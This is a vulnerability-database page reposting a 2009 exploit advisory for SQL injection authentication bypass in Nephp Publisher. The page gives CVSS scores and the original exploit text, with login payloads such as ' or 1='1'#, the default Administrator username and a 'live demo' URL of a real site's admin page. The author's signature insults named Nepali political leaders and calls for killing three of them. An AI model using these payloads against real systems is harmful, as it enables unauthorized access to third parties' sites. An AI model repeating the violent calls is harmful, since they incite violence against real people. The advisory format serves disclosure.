Nephp Publisher Enterprise 4.5 (Auth Bypass) SQL Injection Vulnerability

2009-09-23 / 2009-09-24
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################# # NEPHP publisher SQLi login bypass # # By learn3r hacker from Nepal # # damagicalhacker@gmail.com # ############################################# Affected version: v 3.5.9 or may be lower... Username: valid_username'# [eg. Administrator/*] Password: learn3r [or whatever] Or Username: ' or 1='1'# password: learn3r [or whatever] Live Demo: http://andhracafe.com/admin/index.php Note that Administrator is a default username in this product Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all... FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar By learn3r aka cyb3r lord Nepali Hackerz Are Not Dead!!!

References:

http://xforce.iss.net/xforce/xfdb/53332
http://www.securityfocus.com/bid/36444
http://www.milw0rm.com/exploits/9712


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top